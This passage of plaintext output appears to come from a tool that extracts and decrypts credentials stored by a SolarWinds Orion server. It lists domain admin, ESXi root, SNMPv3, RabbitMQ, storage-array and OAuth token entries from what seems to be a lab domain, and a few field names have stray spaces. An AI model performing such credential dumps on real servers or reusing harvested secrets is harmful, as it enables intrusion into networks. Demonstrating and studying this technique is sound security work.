| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: Erlang cookie
|       Desc: Erlang clustering cookie
|       Owner: Erlang
|               Password: abcdefg12456789abcde
|               Username: ignored
------------------5--------------------------
------------------6--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: RabbitMQ user account
|       Desc: RabbitMQ user account for Message Bus
|       Owner: RabbitMQ
|               Password: LtVmCrzlTNyWmwxpxJMi
|               Username: orion
------------------6--------------------------
------------------7--------------------------
| Ty   pe: SolarWinds.Orion.Core.Models.Credentials.SnmpCredentialsV3
| Name: User: snmpv3user, Context: thisisthecontext
|       Desc:
|       Owner: Orion
|               AuthenticationKeyIsPassword: false
|               AuthenticationPassword: ASDqwe123
|               AuthenticationType: SHA1
|               Context: thisisthecontext
|               PrivacyKeyIsPassword: false
|               PrivacyPassword: ASDqwe123
|               PrivacyType: AES256
|               UserName: snmpv3user
------------------7--------------------------
------------------8--------------------------
| Type: SolarWinds.Orion.Core.Models.Credentials.SnmpCredentialsV3
| Name: User: rootsnmpv3, Context: newcontextv3
|       Desc:
|       Owner: Orion
|               AuthenticationKeyIsPassword: true
|               AuthenticationPassword: ASDqwe123
|               AuthenticationType: MD5
|               Context: newcontextv3   
|               PrivacyKeyIsPassword: true
|               PrivacyPassword: ASDqwe123
|               PrivacyType: AES128
|               UserName: rootsnmpv3
------------------8--------------------------
------------------9--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: DomainAdmin
|       Desc:
|       Owner: Orion
|               Password: ASDqwe123
|               Username: SITTINGDUCK\uberuser
------------------9--------------------------
------------------10--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: DomainJoiner
|       Desc:
|       Owner: Orion
|               Password: ASDqwe123
|               Username: superadmin@sittingduck.info
------------------10--------------------------
------------------11--------------------------
| Type:    SolarWinds.Orion.Core.SharedCredentials.Credentials.UsernamePasswordCredential
| Name: vesxi
|       Desc: vesxi
|       Owner: VIM
|               Password: ASDqwe123
|               Username: root
------------------11--------------------------
------------------12--------------------------
| Type: SolarWinds.Orion.Core.SharedCredentials.Credentials.ActiveDirectoryCredential
| Name: SITTINGDUCK\uberuser
| 	Desc: 
| 	Owner: Orion
| 		Password: ASDqwe213
| 		Username: SITTINGDUCK\uberuser
------------------12--------------------------
------------------13--------------------------
| Type: SolarWinds.APM.Common.Credentials.ApmUsernamePasswordCredential
| Name: App Monitoring User
| 	Desc: 
| 	Owner: APM
| 		Password: ASDqwe123
| 		Username: SITTINGDUCK\uberuser
------------------13--------------------------
------------------14--------------------------
| Type: SolarWinds.SRM.Common.Credent   ials.SmisCredentials
| Name: EMC_SMIS_Solarwinds
| 	Desc: 
| 	Owner: SRM
| 		HttpPort: 5988
| 		HttpsPort: 5989
| 		InteropNamespace: /interop
| 		Namespace: root/emc
| 		Password: ASDqwe123
| 		Username: solarwinds
| 		UseSSL: true
------------------14--------------------------
------------------15--------------------------
| Type: SolarWinds.ESI.Common.Connection.ExternalSystemCredential
| Name: ESC
| 	Desc: 
| 	Owner: ESI
| 		Password: ASDqwe123
| 		Username: solar_winds
------------------15--------------------------
------------------16--------------------------
| Type: SolarWinds.Orion.Web.Integration.OAuth2Token
| Name: SITTINGDUCK\uberuser
| 	Desc: 
| 	Owner: Web.Integration
| 		AccessToken: GthQHd3<snip>
| 		AccessTokenExpiration: 2020-11-01T10:52:50.2768075Z
| 		AccessTokenIssueDate: 2020-11-01T09:52:51.2768075Z
| 		RefreshToken:hEyph9WqIfzm<snip>
   | 		Scopes: 
| 		Username: uberuser@sittingduck.info
------------------16--------------------------
------------------17--------------------------
| Type: SolarWinds.SRM.Common.Credentials.XtremIoHttpCredential
| Name: XtremIO_Admin
| 	Desc: 
| 	Owner: SRM
| 		HttpPort: 80
| 		HttpsPort: 443
| 		Password: ASDqwe123
| 		Username: admin
| 		UseSsl: true
------------------18--------------------------
============================================
============================================